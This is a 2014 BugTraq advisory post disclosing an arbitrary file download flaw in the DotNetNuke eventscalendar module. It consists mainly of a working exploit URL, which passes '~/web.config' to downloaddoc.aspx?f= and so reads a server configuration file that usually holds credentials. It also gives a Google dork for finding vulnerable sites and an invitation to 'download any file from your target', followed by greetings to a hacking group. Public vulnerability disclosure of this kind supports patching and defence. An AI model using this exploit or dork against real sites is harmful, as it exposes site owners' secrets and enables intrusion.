BugTraq
DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability Jun 09 2014 05:31AM
cseye_ut yahoo com
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability
# Author : alieye
# vendor : http://www.invenmanager.com/ , http://store.dnnsoftware.com/
# Contact : cseye_ut (at) yahoo (dot) com [email concealed]
# Risk : High
# Class: Remote
# Google Dork: inurl:/desktopmodules/eventscalendar/
# Version: all version
# Date: 09/06/2014
# os : windows server 2008
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

You can download any file from your target ;)

Exploit : http://victim.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web
.config

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus